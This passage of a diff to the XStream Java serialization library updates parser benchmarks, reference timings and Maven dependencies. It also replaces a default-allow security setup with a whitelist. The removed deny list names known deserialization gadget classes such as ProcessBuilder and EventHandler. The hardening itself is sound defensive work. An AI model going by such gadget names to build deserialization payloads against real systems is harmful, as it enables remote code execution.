--- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java
+++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ConverterTypeBenchmark.java
@@ -1,12 +1,12 @@
/*
- * Copyright (C) 2015, 2017 XStream Committers.
+ * Copyright (C) 2015, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
* style license a copy of which has been included with this distribution in
* the LICENSE.txt file.
*
- * Created on 20.11.2015 by Joerg Schaible
+ * Created on 20 November 2015 by Joerg Schaible
*/
package com.thoughtworks.xstream.benchmark.jmh;
@@ -37,7 +37,7 @@ import com.thoughtworks.xstream.converters.javabean.JavaBeanConverter;
import com.thoughtworks.xstream.converters.reflection.ReflectionConverter;
import com.thoughtworks.xstream.io.HierarchicalStreamReader;
import com.thoughtworks.xstream.io.HierarchicalStreamWriter;
-import com.thoughtworks.xstream.io.xml.Xpp3Driver;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.security.ArrayTypePermission;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;
@@ -230,7 +230,7 @@ public class ConverterTypeBenchmark {
*/
@Setup(Level.Trial)
public void setUp(final BenchmarkParams params) {
- xstream = new XStream(new Xpp3Driver());
+ xstream = new XStream(new MXParserDriver());
xstream.addPermission(NoTypePermission.NONE);
xstream.addPermission(ArrayTypePermission.ARRAYS);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java
index a6b504225b9909eb9ee02c582ea27c3942b27291..b2f83bdadacaed9985d22bb0a0b28bc7a29b9384 100644
--- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java
+++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/ParserBenchmark.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2015, 2017 XStream Committers.
+ * Copyright (C) 2015, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -44,6 +44,7 @@ import com.thoughtworks.xstream.io.xml.DomDriver;
import com.thoughtworks.xstream.io.xml.JDom2Driver;
import com.thoughtworks.xstream.io.xml.JDomDriver;
import com.thoughtworks.xstream.io.xml.KXml2Driver;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.io.xml.PrettyPrintWriter;
import com.thoughtworks.xstream.io.xml.StandardStaxDriver;
import com.thoughtworks.xstream.io.xml.WstxDriver;
@@ -76,6 +77,12 @@ public class ParserBenchmark {
* @since 1.4.9
*/
public enum DriverFactory {
+ /**
+ * Factory for the {@link MXParserDriver}.
+ *
+ * @since 1.4.16
+ */
+ MXParser(new MXParserDriver()), //
/**
* Factory for the {@link Xpp3Driver}.
*
diff --git a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java
index 2ccb72128478801f05200867def18dde7b104ccd..5a74fdbe158286147ffafbbb4970b25a3207fea0 100644
--- a/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java
+++ b/xstream-jmh/src/java/com/thoughtworks/xstream/benchmark/jmh/StringConverterBenchmark.java
@@ -1,12 +1,12 @@
/*
- * Copyright (C) 2015, 2017 XStream Committers.
+ * Copyright (C) 2015, 2017, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
* style license a copy of which has been included with this distribution in
* the LICENSE.txt file.
*
- * Created on 08.11.2015 by Joerg Schaible
+ * Created on 8. November 2015 by Joerg Schaible
*/
package com.thoughtworks.xstream.benchmark.jmh;
@@ -37,6 +37,7 @@ import com.thoughtworks.xstream.converters.SingleValueConverter;
import com.thoughtworks.xstream.converters.basic.AbstractSingleValueConverter;
import com.thoughtworks.xstream.core.util.WeakCache;
import com.thoughtworks.xstream.io.xml.CompactWriter;
+import com.thoughtworks.xstream.io.xml.MXParserDriver;
import com.thoughtworks.xstream.io.xml.PrettyPrintWriter;
import com.thoughtworks.xstream.io.xml.Xpp3Driver;
import com.thoughtworks.xstream.security.ArrayTypePermission;
@@ -257,7 +258,7 @@ public class StringConverterBenchmark {
} else {
throw new IllegalStateException("Unsupported benchmark type: " + benchmark);
}
- xstream = new XStream(new Xpp3Driver());
+ xstream = new XStream(new MXParserDriver());
xstream.addPermission(NoTypePermission.NONE);
xstream.addPermission(ArrayTypePermission.ARRAYS);
xstream.allowTypes(new Class[] {String.class});
diff --git a/xstream-jmh/src/reference/base64.txt b/xstream-jmh/src/reference/base64.txt
index dafa1864538b45fed8f7898a8c38bdb0b13ba777..e7d5eea5b002128c89c14ee58c16cbd5cd4797f3 100644
--- a/xstream-jmh/src/reference/base64.txt
+++ b/xstream-jmh/src/reference/base64.txt
@@ -1,32 +1,31 @@
Benchmark (codec) (data) (driverFactory) (operation) Mode Cnt Score Error Units
-Base64Benchmark.run xstreamInternal small N/A encode avgt 16 426.295 ± 30.263 ns/op
-Base64Benchmark.run xstreamInternal small N/A decode avgt 16 390.516 ± 4.600 ns/op
-Base64Benchmark.run xstreamInternal medium N/A encode avgt 16 78991.509 ± 172.426 ns/op
-Base64Benchmark.run xstreamInternal medium N/A decode avgt 16 96237.821 ± 8716.671 ns/op
-Base64Benchmark.run xstreamInternal big N/A encode avgt 16 28024694.588 ± 777818.782 ns/op
-Base64Benchmark.run xstreamInternal big N/A decode avgt 16 26005576.460 ± 95469.494 ns/op
-Base64Benchmark.run dataTypeConverter small N/A encode avgt 16 116.346 ± 4.724 ns/op
-Base64Benchmark.run dataTypeConverter small N/A decode avgt 16 144.778 ± 4.741 ns/op
-Base64Benchmark.run dataTypeConverter medium N/A encode avgt 16 20738.849 ± 96.411 ns/op
-Base64Benchmark.run dataTypeConverter medium N/A decode avgt 16 26443.941 ± 35.307 ns/op
-Base64Benchmark.run dataTypeConverter big N/A encode avgt 16 10402424.065 ± 292760.969 ns/op
-Base64Benchmark.run dataTypeConverter big N/A decode avgt 16 7684177.150 ± 452226.536 ns/op
-Base64Benchmark.run javaUtil small N/A encode avgt 16 96.584 ± 0.382 ns/op
-Base64Benchmark.run javaUtil small N/A decode avgt 16 83.813 ± 2.605 ns/op
-Base64Benchmark.run javaUtil medium N/A encode avgt 16 14990.533 ± 1510.286 ns/op
-Base64Benchmark.run javaUtil medium N/A decode avgt 16 13194.678 ± 21.584 ns/op
-Base64Benchmark.run javaUtil big N/A encode avgt 16 6210509.128 ± 70567.009 ns/op
-Base64Benchmark.run javaUtil big N/A decode avgt 16 5379677.044 ± 162435.588 ns/op
-Base64Benchmark.run commonsCodec small N/A encode avgt 16 6402.767 ± 13.172 ns/op
-Base64Benchmark.run commonsCodec small N/A decode avgt 16 6325.007 ± 7.691 ns/op
-Base64Benchmark.run commonsCodec medium N/A encode avgt 16 68730.521 ± 2538.713 ns/op
-Base64Benchmark.run commonsCodec medium N/A decode avgt 16 65192.120 ± 4534.865 ns/op
-Base64Benchmark.run commonsCodec big N/A encode avgt 16 30413559.920 ± 211444.968 ns/op
-Base64Benchmark.run commonsCodec big N/A decode avgt 16 21816582.642 ± 616700.770 ns/op
-Base64Benchmark.run migBase small N/A encode avgt 16 98.949 ± 2.753 ns/op
-Base64Benchmark.run migBase small N/A decode avgt 16 124.609 ± 0.332 ns/op
-Base64Benchmark.run migBase medium N/A encode avgt 16 19505.761 ± 1294.819 ns/op
-Base64Benchmark.run migBase medium N/A decode avgt 16 27299.148 ± 908.642 ns/op
-Base64Benchmark.run migBase big N/A encode avgt 16 9984923.156 ± 13611.711 ns/op
-Base64Benchmark.run migBase big N/A decode avgt 16 5733157.575 ± 32241.447 ns/op
-
+Base64Benchmark.run xstreamInternal small N/A encode avgt 16 422.691 ± 0.805 ns/op
+Base64Benchmark.run xstreamInternal small N/A decode avgt 16 401.744 ± 41.549 ns/op
+Base64Benchmark.run xstreamInternal medium N/A encode avgt 16 87980.151 ± 1758.463 ns/op
+Base64Benchmark.run xstreamInternal medium N/A decode avgt 16 90334.626 ± 272.486 ns/op
+Base64Benchmark.run xstreamInternal big N/A encode avgt 16 26829622.608 ± 219338.574 ns/op
+Base64Benchmark.run xstreamInternal big N/A decode avgt 16 25760733.427 ± 892724.693 ns/op
+Base64Benchmark.run dataTypeConverter small N/A encode avgt 16 116.452 ± 4.685 ns/op
+Base64Benchmark.run dataTypeConverter small N/A decode avgt 16 156.041 ± 0.232 ns/op
+Base64Benchmark.run dataTypeConverter medium N/A encode avgt 16 22025.833 ± 871.377 ns/op
+Base64Benchmark.run dataTypeConverter medium N/A decode avgt 16 29199.416 ± 1366.584 ns/op
+Base64Benchmark.run dataTypeConverter big N/A encode avgt 16 10173025.627 ± 14375.190 ns/op
+Base64Benchmark.run dataTypeConverter big N/A decode avgt 16 7645745.427 ± 378490.086 ns/op
+Base64Benchmark.run javaUtil small N/A encode avgt 16 113.013 ± 10.478 ns/op
+Base64Benchmark.run javaUtil small N/A decode avgt 16 83.877 ± 0.298 ns/op
+Base64Benchmark.run javaUtil medium N/A encode avgt 16 14425.936 ± 39.693 ns/op
+Base64Benchmark.run javaUtil medium N/A decode avgt 16 13846.668 ± 779.799 ns/op
+Base64Benchmark.run javaUtil big N/A encode avgt 16 6149989.342 ± 199233.302 ns/op
+Base64Benchmark.run javaUtil big N/A decode avgt 16 5342302.204 ± 18186.258 ns/op
+Base64Benchmark.run commonsCodec small N/A encode avgt 16 6390.608 ± 72.975 ns/op
+Base64Benchmark.run commonsCodec small N/A decode avgt 16 6385.171 ± 89.129 ns/op
+Base64Benchmark.run commonsCodec medium N/A encode avgt 16 68085.447 ± 138.335 ns/op
+Base64Benchmark.run commonsCodec medium N/A decode avgt 16 68183.900 ± 6315.687 ns/op
+Base64Benchmark.run commonsCodec big N/A encode avgt 16 29120324.467 ± 745830.065 ns/op
+Base64Benchmark.run commonsCodec big N/A decode avgt 16 22775668.935 ± 627458.817 ns/op
+Base64Benchmark.run migBase small N/A encode avgt 16 107.834 ± 0.218 ns/op
+Base64Benchmark.run migBase small N/A decode avgt 16 110.671 ± 5.789 ns/op
+Base64Benchmark.run migBase medium N/A encode avgt 16 19048.637 ± 1321.623 ns/op
+Base64Benchmark.run migBase medium N/A decode avgt 16 22464.136 ± 30.464 ns/op
+Base64Benchmark.run migBase big N/A encode avgt 16 10101223.925 ± 193350.342 ns/op
+Base64Benchmark.run migBase big N/A decode avgt 16 6967471.163 ± 405344.659 ns/op
diff --git a/xstream-jmh/src/reference/converterType.txt b/xstream-jmh/src/reference/converterType.txt
index da6c6bd6cc0a3a412027502be86630d75aa1842d..e2ce90c0215f5cca4139f930b0a7e51339df1d01 100644
--- a/xstream-jmh/src/reference/converterType.txt
+++ b/xstream-jmh/src/reference/converterType.txt
@@ -1,4 +1,4 @@
Benchmark Mode Cnt Score Error Units
-ConverterTypeBenchmark.custom avgt 16 9511483.088 ± 319352.540 ns/op
-ConverterTypeBenchmark.javaBean avgt 16 18956037.656 ± 1379941.067 ns/op
-ConverterTypeBenchmark.reflection avgt 16 22467750.653 ± 26871.357 ns/op
+ConverterTypeBenchmark.custom avgt 16 9324531.713 ± 12182.415 ns/op
+ConverterTypeBenchmark.javaBean avgt 16 19658157.449 ± 84554.958 ns/op
+ConverterTypeBenchmark.reflection avgt 16 20859870.075 ± 2470686.138 ns/op
diff --git a/xstream-jmh/src/reference/nameCoder.txt b/xstream-jmh/src/reference/nameCoder.txt
index a2fb2f3fd94f0c6c1bb7617d0adc36161cf71b76..c6fc3f8d2523b39647969f43269b29358ef382cd 100644
--- a/xstream-jmh/src/reference/nameCoder.txt
+++ b/xstream-jmh/src/reference/nameCoder.txt
@@ -1,6 +1,6 @@
Benchmark Mode Cnt Score Error Units
-NameCoderBenchmark.cachedEscapedUnderscoreCoding avgt 25 4486384.078 ± 76466.208 ns/op
-NameCoderBenchmark.dollarCoding avgt 25 5006636.275 ± 393688.573 ns/op
-NameCoderBenchmark.escapedUnderscoreCoding avgt 25 6714770.410 ± 140953.970 ns/op
-NameCoderBenchmark.noCoding avgt 25 4068459.179 ± 187522.480 ns/op
-NameCoderBenchmark.xmlFriendlyCoding avgt 25 5017414.939 ± 233268.851 ns/op
+NameCoderBenchmark.cachedEscapedUnderscoreCoding avgt 25 4339193.305 ± 117708.908 ns/op
+NameCoderBenchmark.dollarCoding avgt 25 4570684.356 ± 169447.323 ns/op
+NameCoderBenchmark.escapedUnderscoreCoding avgt 25 6322642.927 ± 176678.518 ns/op
+NameCoderBenchmark.noCoding avgt 25 3917564.563 ± 150151.093 ns/op
+NameCoderBenchmark.xmlFriendlyCoding avgt 25 5102368.550 ± 129434.626 ns/op
diff --git a/xstream-jmh/src/reference/parsers.txt b/xstream-jmh/src/reference/parsers.txt
index 9468ca478b091e5870b071fb3868a9e47e328dd6..4aa87f63989c036409d9488d2e9e30352539b4d1 100644
--- a/xstream-jmh/src/reference/parsers.txt
+++ b/xstream-jmh/src/reference/parsers.txt
@@ -1,37 +1,40 @@
Benchmark (driverFactory) Mode Cnt Score Error Units
-ParserBenchmark.parseBigText Xpp3 avgt 15 2076542.383 ± 21070.325 ns/op
-ParserBenchmark.parseBigText kXML2 avgt 15 3609529.640 ± 70339.168 ns/op
-ParserBenchmark.parseBigText JDKStax avgt 15 8449107.541 ± 61967.793 ns/op
-ParserBenchmark.parseBigText Woodstox avgt 15 1958090.473 ± 16778.643 ns/op
-ParserBenchmark.parseBigText BEAStax avgt 15 3208123.897 ± 77313.722 ns/op
-ParserBenchmark.parseBigText DOM avgt 15 10587727.502 ± 102744.156 ns/op
-ParserBenchmark.parseBigText DOM4J avgt 15 8680900.188 ± 54539.385 ns/op
-ParserBenchmark.parseBigText JDom avgt 15 6541414.372 ± 96753.674 ns/op
-ParserBenchmark.parseBigText JDom2 avgt 15 5870155.438 ± 25749.627 ns/op
-ParserBenchmark.parseBigText Xom avgt 15 8062184.585 ± 37582.497 ns/op
-ParserBenchmark.parseBigText Binary avgt 15 1057890.361 ± 18005.100 ns/op
-ParserBenchmark.parseBigText Jettison avgt 15 3610357.375 ± 8660.257 ns/op
-ParserBenchmark.parseManyChildren Xpp3 avgt 15 717142.178 ± 9704.905 ns/op
-ParserBenchmark.parseManyChildren kXML2 avgt 15 886358.766 ± 12643.107 ns/op
-ParserBenchmark.parseManyChildren JDKStax avgt 15 771151.977 ± 10866.825 ns/op
-ParserBenchmark.parseManyChildren Woodstox avgt 15 764703.865 ± 4983.789 ns/op
-ParserBenchmark.parseManyChildren BEAStax avgt 15 862349.819 ± 23927.845 ns/op
-ParserBenchmark.parseManyChildren DOM avgt 15 58925980.509 ± 521905.776 ns/op
-ParserBenchmark.parseManyChildren DOM4J avgt 15 79133279.111 ± 1467045.110 ns/op
-ParserBenchmark.parseManyChildren JDom avgt 15 6842504.530 ± 143906.198 ns/op
-ParserBenchmark.parseManyChildren JDom2 avgt 15 9833407.570 ± 63131.868 ns/op
-ParserBenchmark.parseManyChildren Xom avgt 15 33057256.100 ± 297855.633 ns/op
-ParserBenchmark.parseManyChildren Binary avgt 15 385824.031 ± 2954.123 ns/op
-ParserBenchmark.parseManyChildren Jettison avgt 15 594530.928 ± 4278.299 ns/op
-ParserBenchmark.parseNestedElements Xpp3 avgt 15 12332209.281 ± 64122.445 ns/op
-ParserBenchmark.parseNestedElements kXML2 avgt 15 37562872.191 ± 643160.833 ns/op
-ParserBenchmark.parseNestedElements JDKStax avgt 15 630602.435 ± 5082.416 ns/op
-ParserBenchmark.parseNestedElements Woodstox avgt 15 852446.766 ± 6384.039 ns/op
-ParserBenchmark.parseNestedElements BEAStax avgt 15 798003.236 ± 20589.177 ns/op
-ParserBenchmark.parseNestedElements DOM avgt 15 5547526.718 ± 38346.961 ns/op
-ParserBenchmark.parseNestedElements DOM4J avgt 15 5501080.957 ± 46423.792 ns/op
-ParserBenchmark.parseNestedElements JDom avgt 15 19329741.881 ± 366881.645 ns/op
-ParserBenchmark.parseNestedElements JDom2 avgt 15 18291190.166 ± 54336.659 ns/op
-ParserBenchmark.parseNestedElements Xom avgt 15 5842749.643 ± 55364.906 ns/op
-ParserBenchmark.parseNestedElements Binary avgt 15 255649.550 ± 4896.859 ns/op
-ParserBenchmark.parseNestedElements Jettison avgt 15 674957.675 ± 6296.073 ns/op
+ParserBenchmark.parseBigText MXParser avgt 15 2131602.489 ± 25703.664 ns/op
+ParserBenchmark.parseBigText Xpp3 avgt 15 2084284.951 ± 14376.744 ns/op
+ParserBenchmark.parseBigText kXML2 avgt 15 3561706.234 ± 28443.949 ns/op
+ParserBenchmark.parseBigText JDKStax avgt 15 8450930.541 ± 114260.574 ns/op
+ParserBenchmark.parseBigText Woodstox avgt 15 1959085.951 ± 4958.052 ns/op
+ParserBenchmark.parseBigText BEAStax avgt 15 3182516.188 ± 38272.584 ns/op
+ParserBenchmark.parseBigText DOM avgt 15 10568442.558 ± 153957.726 ns/op
+ParserBenchmark.parseBigText DOM4J avgt 15 8543670.534 ± 35374.800 ns/op
+ParserBenchmark.parseBigText JDom avgt 15 6379300.940 ± 39285.532 ns/op
+ParserBenchmark.parseBigText JDom2 avgt 15 5929805.928 ± 118564.329 ns/op
+ParserBenchmark.parseBigText Xom avgt 15 7968868.873 ± 26730.256 ns/op
+ParserBenchmark.parseBigText Binary avgt 15 1065228.134 ± 5642.331 ns/op
+ParserBenchmark.parseBigText Jettison avgt 15 3682704.689 ± 56568.770 ns/op
+ParserBenchmark.parseManyChildren MXParser avgt 15 814691.675 ± 3495.652 ns/op
+ParserBenchmark.parseManyChildren Xpp3 avgt 15 754593.348 ± 16963.908 ns/op
+ParserBenchmark.parseManyChildren kXML2 avgt 15 855787.083 ± 2364.443 ns/op
+ParserBenchmark.parseManyChildren JDKStax avgt 15 885917.070 ± 27740.420 ns/op
+ParserBenchmark.parseManyChildren Woodstox avgt 15 630843.461 ± 16713.507 ns/op
+ParserBenchmark.parseManyChildren BEAStax avgt 15 667706.032 ± 11089.959 ns/op
+ParserBenchmark.parseManyChildren DOM avgt 15 59894584.643 ± 305491.167 ns/op
+ParserBenchmark.parseManyChildren DOM4J avgt 15 79125701.566 ± 1579465.065 ns/op
+ParserBenchmark.parseManyChildren JDom avgt 15 6887733.303 ± 102619.220 ns/op
+ParserBenchmark.parseManyChildren JDom2 avgt 15 9876176.832 ± 48837.176 ns/op
+ParserBenchmark.parseManyChildren Xom avgt 15 34141742.595 ± 475598.891 ns/op
+ParserBenchmark.parseManyChildren Binary avgt 15 405493.660 ± 4239.044 ns/op
+ParserBenchmark.parseManyChildren Jettison avgt 15 601803.834 ± 2160.122 ns/op
+ParserBenchmark.parseNestedElements MXParser avgt 15 13287597.794 ± 343543.709 ns/op
+ParserBenchmark.parseNestedElements Xpp3 avgt 15 13056389.184 ± 132562.496 ns/op
+ParserBenchmark.parseNestedElements kXML2 avgt 15 36819091.742 ± 300358.967 ns/op
+ParserBenchmark.parseNestedElements JDKStax avgt 15 868883.676 ± 15697.149 ns/op
+ParserBenchmark.parseNestedElements Woodstox avgt 15 835465.393 ± 19498.030 ns/op
+ParserBenchmark.parseNestedElements BEAStax avgt 15 603986.803 ± 2529.449 ns/op
+ParserBenchmark.parseNestedElements DOM avgt 15 5382390.375 ± 82043.169 ns/op
+ParserBenchmark.parseNestedElements DOM4J avgt 15 5372787.809 ± 127206.586 ns/op
+ParserBenchmark.parseNestedElements JDom avgt 15 13598531.633 ± 96889.652 ns/op
+ParserBenchmark.parseNestedElements JDom2 avgt 15 12503949.903 ± 502488.951 ns/op
+ParserBenchmark.parseNestedElements Xom avgt 15 5425911.128 ± 23777.824 ns/op
+ParserBenchmark.parseNestedElements Binary avgt 15 284620.649 ± 1734.011 ns/op
+ParserBenchmark.parseNestedElements Jettison avgt 15 678187.271 ± 19300.714 ns/op
diff --git a/xstream-jmh/src/reference/stringConverter.txt b/xstream-jmh/src/reference/stringConverter.txt
index 009eb18fed13bd7d3ec4f68960647f4a1bbadcf8..0f35a4bb2dc8828d5b0fad8f0518a4b81712bd29 100644
--- a/xstream-jmh/src/reference/stringConverter.txt
+++ b/xstream-jmh/src/reference/stringConverter.txt
@@ -1,7 +1,7 @@
Benchmark Mode Cnt Score Error Units
-StringConverterBenchmark.intern avgt 16 12528650.663 ± 56567.910 ns/op
-StringConverterBenchmark.limitedConcurrentMap avgt 16 10583918.884 ± 212931.336 ns/op
-StringConverterBenchmark.limitedSynchronizedWeakCache avgt 16 11104926.490 ± 567963.839 ns/op
-StringConverterBenchmark.nonCaching avgt 16 9381243.000 ± 11471.064 ns/op
-StringConverterBenchmark.unlimitedConcurrentMap avgt 16 11762308.937 ± 510331.968 ns/op
-StringConverterBenchmark.unlimitedSynchronizedWeakCache avgt 16 11092087.483 ± 546550.827 ns/op
+StringConverterBenchmark.intern avgt 16 14262839.973 ± 1233510.125 ns/op
+StringConverterBenchmark.limitedConcurrentMap avgt 16 10538757.220 ± 20805.104 ns/op
+StringConverterBenchmark.limitedSynchronizedWeakCache avgt 16 11298773.753 ± 13335.307 ns/op
+StringConverterBenchmark.nonCaching avgt 16 9796296.611 ± 668511.980 ns/op
+StringConverterBenchmark.unlimitedConcurrentMap avgt 16 11252298.498 ± 215637.373 ns/op
+StringConverterBenchmark.unlimitedSynchronizedWeakCache avgt 16 11279714.685 ± 22069.538 ns/op
diff --git a/xstream/pom.xml b/xstream/pom.xml
index 1679ded635517e260eea67f10dc3da785311a62e..0df977bf20f9b37b1c7997c1cc68159daccac8af 100644
--- a/xstream/pom.xml
+++ b/xstream/pom.xml
@@ -1,7 +1,7 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<!--
Copyright (C) 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</parent>
<artifactId>xstream</artifactId>
<packaging>jar</packaging>
@@ -45,14 +45,14 @@
</dependency>
<dependency>
- <groupId>stax</groupId>
- <artifactId>stax</artifactId>
+ <groupId>org.codehaus.woodstox</groupId>
+ <artifactId>wstx-asl</artifactId>
<optional>true</optional>
</dependency>
<dependency>
- <groupId>org.codehaus.woodstox</groupId>
- <artifactId>wstx-asl</artifactId>
+ <groupId>stax</groupId>
+ <artifactId>stax</artifactId>
<optional>true</optional>
</dependency>
@@ -69,8 +69,8 @@
</dependency>
<dependency>
- <groupId>xmlpull</groupId>
- <artifactId>xmlpull</artifactId>
+ <groupId>io.github.x-stream</groupId>
+ <artifactId>mxparser</artifactId>
</dependency>
<dependency>
@@ -90,6 +90,7 @@
<dependency>
<groupId>xpp3</groupId>
<artifactId>xpp3_min</artifactId>
+ <optional>true</optional>
</dependency>
<dependency>
@@ -640,6 +641,7 @@
<bundle.import.package>
org.xmlpull.mxp1;resolution:=optional,
org.xmlpull.v1;resolution:=optional,
+ io.github.xstream.mxparser.*;resolution:=optional,
com.ibm.*;resolution:=optional,
com.sun.*;resolution:=optional,
javax.*;resolution:=optional,
diff --git a/xstream/src/java/com/thoughtworks/xstream/XStream.java b/xstream/src/java/com/thoughtworks/xstream/XStream.java
index 8415da259d562765c94cf08b8ef95ac3952a367f..7d90dc7f9670cda8c64bed34fc2f56ecf1299a44 100644
--- a/xstream/src/java/com/thoughtworks/xstream/XStream.java
+++ b/xstream/src/java/com/thoughtworks/xstream/XStream.java
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2003, 2004, 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -36,7 +36,6 @@ import java.net.URL;
import java.nio.charset.Charset;
import java.text.DecimalFormatSymbols;
import java.util.ArrayList;
-import java.util.Arrays;
import java.util.BitSet;
import java.util.Calendar;
import java.util.Collection;
@@ -318,9 +317,6 @@ public class XStream {
private SecurityMapper securityMapper;
private AnnotationConfiguration annotationConfiguration;
- private transient boolean securityInitialized;
- private transient boolean securityWarningGiven;
-
public static final int NO_REFERENCES = 1001;
public static final int ID_REFERENCES = 1002;
public static final int XPATH_RELATIVE_REFERENCES = 1003;
@@ -335,9 +331,6 @@ public class XStream {
private static final String ANNOTATION_MAPPER_TYPE = "com.thoughtworks.xstream.mapper.AnnotationMapper";
private static final Pattern IGNORE_ALL = Pattern.compile(".*");
- private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
- private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
- private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream");
/**
* Constructs a default XStream.
@@ -622,19 +615,19 @@ public class XStream {
elementIgnoringMapper = (ElementIgnoringMapper)this.mapper.lookupMapperOfType(ElementIgnoringMapper.class);
fieldAliasingMapper = (FieldAliasingMapper)this.mapper.lookupMapperOfType(FieldAliasingMapper.class);
attributeMapper = (AttributeMapper)this.mapper.lookupMapperOfType(AttributeMapper.class);
- attributeAliasingMapper = (AttributeAliasingMapper)this.mapper
- .lookupMapperOfType(AttributeAliasingMapper.class);
- systemAttributeAliasingMapper = (SystemAttributeAliasingMapper)this.mapper
- .lookupMapperOfType(SystemAttributeAliasingMapper.class);
- implicitCollectionMapper = (ImplicitCollectionMapper)this.mapper
- .lookupMapperOfType(ImplicitCollectionMapper.class);
- defaultImplementationsMapper = (DefaultImplementationsMapper)this.mapper
- .lookupMapperOfType(DefaultImplementationsMapper.class);
+ attributeAliasingMapper = (AttributeAliasingMapper)this.mapper.lookupMapperOfType(
+ AttributeAliasingMapper.class);
+ systemAttributeAliasingMapper = (SystemAttributeAliasingMapper)this.mapper.lookupMapperOfType(
+ SystemAttributeAliasingMapper.class);
+ implicitCollectionMapper = (ImplicitCollectionMapper)this.mapper.lookupMapperOfType(
+ ImplicitCollectionMapper.class);
+ defaultImplementationsMapper = (DefaultImplementationsMapper)this.mapper.lookupMapperOfType(
+ DefaultImplementationsMapper.class);
immutableTypesMapper = (ImmutableTypesMapper)this.mapper.lookupMapperOfType(ImmutableTypesMapper.class);
localConversionMapper = (LocalConversionMapper)this.mapper.lookupMapperOfType(LocalConversionMapper.class);
securityMapper = (SecurityMapper)this.mapper.lookupMapperOfType(SecurityMapper.class);
- annotationConfiguration = (AnnotationConfiguration)this.mapper
- .lookupMapperOfType(AnnotationConfiguration.class);
+ annotationConfiguration = (AnnotationConfiguration)this.mapper.lookupMapperOfType(
+ AnnotationConfiguration.class);
}
protected void setupSecurity() {
@@ -642,113 +635,108 @@ public class XStream {
return;
}
- addPermission(AnyTypePermission.ANY);
- denyTypes(new String[]{
- "java.beans.EventHandler", //
- "java.lang.ProcessBuilder", //
- "javax.imageio.ImageIO$ContainsFilter", //
- "jdk.nashorn.internal.objects.NativeString" });
- denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM});
- allowTypeHierarchy(Exception.class);
- securityInitialized = false;
+ addPermission(NoTypePermission.NONE);
+ addPermission(NullPermission.NULL);
+ addPermission(PrimitiveTypePermission.PRIMITIVES);
+ addPermission(ArrayTypePermission.ARRAYS);
+ addPermission(InterfaceTypePermission.INTERFACES);
+ allowTypeHierarchy(Calendar.class);
+ allowTypeHierarchy(Collection.class);
+ allowTypeHierarchy(Map.class);
+ allowTypeHierarchy(Map.Entry.class);
+ allowTypeHierarchy(Member.class);
+ allowTypeHierarchy(Number.class);
+ allowTypeHierarchy(Throwable.class);
+ allowTypeHierarchy(TimeZone.class);
+
+ Class type = JVM.loadClassForName("java.lang.Enum");
+ if (type != null) {
+ allowTypeHierarchy(type);
+ }
+ type = JVM.loadClassForName("java.nio.file.Path");
+ if (type != null) {
+ allowTypeHierarchy(type);
+ }
+
+ final Set types = new HashSet();
+ types.add(BitSet.class);
+ types.add(Charset.class);
+ types.add(Class.class);
+ types.add(Currency.class);
+ types.add(Date.class);
+ types.add(DecimalFormatSymbols.class);
+ types.add(File.class);
+ types.add(Locale.class);
+ types.add(Object.class);
+ types.add(Pattern.class);
+ types.add(StackTraceElement.class);
+ types.add(String.class);
+ types.add(StringBuffer.class);
+ types.add(JVM.loadClassForName("java.lang.StringBuilder"));
+ types.add(URL.class);
+ types.add(URI.class);
+ types.add(JVM.loadClassForName("java.util.UUID"));
+ if (JVM.isSQLAvailable()) {
+ types.add(JVM.loadClassForName("java.sql.Timestamp"));
+ types.add(JVM.loadClassForName("java.sql.Time"));
+ types.add(JVM.loadClassForName("java.sql.Date"));
+ }
+ if (JVM.isVersion(8)) {
+ allowTypeHierarchy(JVM.loadClassForName("java.time.Clock"));
